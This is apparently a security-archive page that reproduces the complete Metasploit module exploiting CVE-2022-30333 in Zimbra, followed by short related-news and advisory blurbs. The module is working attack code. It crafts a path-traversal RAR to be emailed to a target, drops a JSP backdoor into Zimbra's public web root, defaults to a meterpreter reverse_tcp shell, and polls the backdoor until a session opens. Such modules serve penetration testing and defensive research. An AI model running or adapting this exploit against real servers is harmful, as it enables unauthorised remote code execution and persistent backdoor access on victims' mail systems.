Headline
Zimbra UnRAR Path Traversal
This Metasploit module creates a RAR file that can be emailed to a Zimbra server to exploit CVE-2022-30333. If successful, it plants a JSP-based backdoor in the public web directory, then executes that backdoor. The core vulnerability is a path-traversal issue in unRAR that can extract an arbitrary file to an arbitrary location on a Linux system. This issue is exploitable on Zimbra Collaboration versions 9.0.0 Patch 24 and below and 8.8.15 Patch 31 and below provided that UnRAR versions 6.11 or below are installed.
### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FILEFORMAT include Msf::Exploit::EXE include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper include Msf::Exploit::Format::RarSymlinkPathTraversal def initialize(info = {}) super( update_info( info, 'Name' => 'UnRAR Path Traversal in Zimbra (CVE-2022-30333)', 'Description' => %q{ This module creates a RAR file that can be emailed to a Zimbra server to exploit CVE-2022-30333. If successful, it plants a JSP-based backdoor in the public web directory, then executes that backdoor. The core vulnerability is a path-traversal issue in unRAR that can extract an arbitrary file to an arbitrary location on a Linux system. This issue is exploitable on the following versions of Zimbra, provided UnRAR version 6.11 or earlier is installed: * Zimbra Collaboration 9.0.0 Patch 24 (and earlier) * Zimbra Collaboration 8.8.15 Patch 31 (and earlier) }, 'Author' => [ 'Simon Scannell', # Discovery / initial disclosure (via Sonar) 'Ron Bowes', # Analysis, PoC, and module ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2022-30333'], ['URL', 'https://blog.sonarsource.com/zimbra-pre-auth-rce-via-unrar-0day/'], ['URL', 'https://github.com/pmachapman/unrar/commit/22b52431a0581ab5d687747b65662f825ec03946'], ['URL', 'https://wiki.zimbra.com/wiki/Zimbra_Releases/9.0.0/P25'], ['URL', 'https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P32'], ['URL', 'https://attackerkb.com/topics/RCa4EIZdbZ/cve-2022-30333/rapid7-analysis'], ], 'Platform' => 'linux', 'Arch' => [ARCH_X86, ARCH_X64], 'Targets' => [ [ 'Zimbra Collaboration Suite', {} ] ], 'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp', 'TARGET_PATH' => '../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/', 'TARGET_FILENAME' => nil, 'DisablePayloadHandler' => false, 'RPORT' => 443, 'SSL' => true }, 'Stance' => Msf::Exploit::Stance::Passive, 'DefaultTarget' => 0, 'Privileged' => false, 'DisclosureDate' => '2022-06-28', 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [IOC_IN_LOGS] } ) ) register_options( [ OptString.new('FILENAME', [ false, 'The file name.', 'payload.rar']), # Separating the path, filename, and extension allows us to randomize the filename OptString.new('TARGET_PATH', [ true, 'The location the payload should extract to (can, and should, contain path traversal characters - "../../").']), OptString.new('TARGET_FILENAME', [ false, 'The filename to write in the target directory; should have a .jsp extension (default: <random>.jsp).']), ] ) register_advanced_options( [ OptString.new('SYMLINK_FILENAME', [ false, 'The name of the symlink file to use (must be 12 characters or less; default: random)']), OptBool.new('TRIGGER_PAYLOAD', [ false, 'If set, attempt to trigger the payload via an HTTP request.', true ]), # Took this from multi/handler OptInt.new('ListenerTimeout', [ false, 'The maximum number of seconds to wait for new sessions.', 0 ]), OptInt.new('CheckInterval', [ true, 'The number of seconds to wait between each attempt to trigger the payload on the server.', 5 ]) ] ) end # Generate an on-system filename using datastore options def generate_target_filename if datastore['TARGET_FILENAME'] && !datastore['TARGET_FILENAME'].end_with?('.jsp') print_Warning('TARGET_FILENAME does not end with .jsp, was that intentional?') end File.join(datastore['TARGET_PATH'], datastore['TARGET_FILENAME'] || "#{Rex::Text.rand_text_alpha_lower(4..10)}.jsp") end # Normalize the path traversal and figure out where it is relative to the web root def zimbra_get_public_path(target_filename) # Normalize the path normalized_path = Pathname.new(File.join('/opt/zimbra/data/amavisd/tmp', target_filename)).cleanpath # Figure out where it is, relative to the webroot webroot = Pathname.new('/opt/zimbra/jetty_base/webapps/zimbra/') relative_path = normalized_path.relative_path_from(webroot) # Hopefully, we found a path from the webroot to the payload! if relative_path.to_s.start_with?('../') return nil end relative_path end def exploit print_status('Encoding the payload as a .jsp file') payload = Msf::Util::EXE.to_jsp(generate_payload_exe) # Create a file target_filename = generate_target_filename print_status("Target filename: #{target_filename}") begin rar = encode_as_traversal_rar(datastore['SYMLINK_FILENAME'] || Rex::Text.rand_text_alpha_lower(4..12), target_filename, payload) rescue StandardError => e fail_with(Failure::BadConfig, "Failed to encode RAR file: #{e}") end file_create(rar) print_good('File created! Email the file above to any user on the target Zimbra server') # Bail if they don't want the payload triggered return unless datastore['TRIGGER_PAYLOAD'] # Get the public path for triggering the vulnerability, terminate if we # can't figure it out public_filename = zimbra_get_public_path(target_filename) if public_filename.nil? print_warning('Could not determine the public web path, disabling payload triggering') return end register_file_for_cleanup(target_filename) interval = datastore['CheckInterval'].to_i print_status("Trying to trigger the backdoor @ #{public_filename} every #{interval}s [backgrounding]...") # This loop is mostly from `multi/handler` stime = Process.clock_gettime(Process::CLOCK_MONOTONIC).to_i timeout = datastore['ListenerTimeout'].to_i loop do break if session_created? break if timeout > 0 && (stime + timeout < Process.clock_gettime(Process::CLOCK_MONOTONIC).to_i) res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(public_filename) ) unless res fail_with(Failure::Unknown, 'Could not connect to the server to trigger the payload') end Rex::ThreadSafe.sleep(interval) end endend
Related news
This Metasploit module creates a RAR file that exploits CVE-2022-30333, which is a path-traversal vulnerability in unRAR that can extract an arbitrary file to an arbitrary location on a Linux system. UnRAR fixed this vulnerability in version 6.12 (open source version 6.1.7). The core issue is that when a symbolic link is unRARed, Windows symbolic links are not properly validated on Linux systems and can therefore write a symbolic link that points anywhere on the filesystem. If a second file in the archive has the same name, it will be written to the symbolic link path.
Hello everyone! It has been 3 months since the last episode. I spent most of this time improving my Vulristics project. So in this episode, let’s take a look at what’s been done. Alternative video link (for Russia): https://vk.com/video-149273431_456239139 Also, let’s take a look at the Microsoft Patch Tuesdays vulnerabilities, Linux Patch Wednesdays vulnerabilities and […]
Gentoo Linux Security Advisory 202309-4 - An arbitrary file overwrite vulnerability has been discovered in RAR and UnRAR, potentially resulting in arbitrary code execution. Versions greater than or equal to 6.23 are affected.
Attackers are targeting Zimbra systems in the public and private sectors, looking to exploit multiple vulnerabilities, CISA says.
Multiple high-severity security flaws have been disclosed as affecting Juniper Networks devices, some of which could be exploited to achieve code execution. Chief among them is a remote pre-authenticated PHP archive file deserialization vulnerability (CVE-2022-22241, CVSS score: 8.1) in the J-Web component of Junos OS, according to Octagon Networks researcher Paulos Yibelo. "This vulnerability
Mitigation guidance provided while a patch is being developed
A severe remote code execution vulnerability in Zimbra's enterprise collaboration software and email platform is being actively exploited, with no patch currently available to remediate the issue. The shortcoming, assigned CVE-2022-41352, carries a critical-severity rating of CVSS 9.8, providing a pathway for attackers to upload arbitrary files and carry out malicious actions on affected
As many as 350,000 open source projects are believed to be potentially vulnerable to exploitation as a result of a security flaw in a Python module that has remained unpatched for 15 years. The open source repositories span a number of industry verticals, such as software development, artificial intelligence/machine learning, web development, media, security, IT management. The shortcoming,
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Tuesday added a recently disclosed security flaw in the UnRAR utility to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. Tracked as CVE-2022-30333 (CVSS score: 7.5), the issue concerns a path traversal vulnerability in the Unix versions of UnRAR that can be triggered upon extracting a
Other applications using binary to extract untrusted archives are potentially vulnerable too
A new security vulnerability has been disclosed in RARlab's UnRAR utility that, if successfully exploited, could permit a remote attacker to execute arbitrary code on a system that relies on the binary. The flaw, assigned the identifier CVE-2022-30333, relates to a path traversal vulnerability in the Unix versions of UnRAR that can be triggered upon extracting a maliciously crafted RAR archive.
RARLAB UnRAR before 6.12 on Linux and UNIX allows directory traversal to write to files during an extract (aka unpack) operation, as demonstrated by creating a ~/.ssh/authorized_keys file. NOTE: WinRAR and Android RAR are unaffected.